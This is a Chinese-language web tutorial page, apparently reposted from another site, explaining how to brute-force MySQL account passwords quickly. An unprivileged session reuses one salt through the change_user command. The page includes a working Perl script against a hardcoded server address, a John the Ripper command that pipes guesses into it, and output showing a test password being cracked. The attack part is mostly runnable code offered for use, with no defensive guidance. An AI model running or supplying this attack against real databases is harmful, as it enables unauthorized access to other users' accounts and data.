Home Database Mysql Tutorial 快速的 MySQL 本地和远程密码破解_MySQL

快速的 MySQL 本地和远程密码破解_MySQL

Jun 01, 2016 pm 01:38 PM
Password cracking database user

bitsCN.com

 

快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。

我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

方法如下:

攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。

是什么导致非常慢?

因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。

下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:

测试的用户是 crackme 密码为 pass,只需数秒就可破解。

(大约 20 秒钟可测试 10 万密码)

测试脚本如下:

01 use Net::MySQL; 02   03 $|=1; 04   05 my $mysql = Net::MySQL->new( 06  hostname => '192.168.2.3', 07  database => 'test', 08  user     => "user", 09  password => "secret", 10  debug => 0, 11 ); 12   13 $crackuser = "crackme"; 14   15 while() { 16 chomp; 17 $currentpass = $_; 18   19 $vv = join "/0", 20         $crackuser, 21         "/x14". 22         Net::MySQL::Password->scramble( 23             $currentpass, $mysql->{salt}, $mysql->{client_capabilities} 24         ) . "/0"; 25 if ($mysql->_execute_command("/x11", $vv) ne undef) { 26     print "[*] Cracked! --> $currentpass/n"; 27     exit; 28 } 29 }

下面是我这台机器上的执行结果:

C:/Users/kingcope/Desktop>C:/Users/kingcope/Desktop/john179/run/jo

hn --incremental --stdout=5 | perl mysqlcrack.pl 
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH 
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap 
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3 
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429 
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141 
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n 
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2 
[*] Cracked! --> pass 
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs 


Session aborted

祝你好运:)

via grok

bitsCN.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot Article Tags

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

How to use Xiaohongshu account to find users? Can I find my mobile phone number? How to use Xiaohongshu account to find users? Can I find my mobile phone number? Mar 22, 2024 am 08:40 AM

How to use Xiaohongshu account to find users? Can I find my mobile phone number?

How does Go language implement the addition, deletion, modification and query operations of the database? How does Go language implement the addition, deletion, modification and query operations of the database? Mar 27, 2024 pm 09:39 PM

How does Go language implement the addition, deletion, modification and query operations of the database?

Detailed tutorial on establishing a database connection using MySQLi in PHP Detailed tutorial on establishing a database connection using MySQLi in PHP Jun 04, 2024 pm 01:42 PM

Detailed tutorial on establishing a database connection using MySQLi in PHP

How does Hibernate implement polymorphic mapping? How does Hibernate implement polymorphic mapping? Apr 17, 2024 pm 12:09 PM

How does Hibernate implement polymorphic mapping?

iOS 18 adds a new 'Recovered' album function to retrieve lost or damaged photos iOS 18 adds a new 'Recovered' album function to retrieve lost or damaged photos Jul 18, 2024 am 05:48 AM

iOS 18 adds a new 'Recovered' album function to retrieve lost or damaged photos

An in-depth analysis of how HTML reads the database An in-depth analysis of how HTML reads the database Apr 09, 2024 pm 12:36 PM

An in-depth analysis of how HTML reads the database

Analysis of the basic principles of MySQL database management system Analysis of the basic principles of MySQL database management system Mar 25, 2024 pm 12:42 PM

Analysis of the basic principles of MySQL database management system

Tips and practices for handling Chinese garbled characters in databases with PHP Tips and practices for handling Chinese garbled characters in databases with PHP Mar 27, 2024 pm 05:21 PM

Tips and practices for handling Chinese garbled characters in databases with PHP

See all articles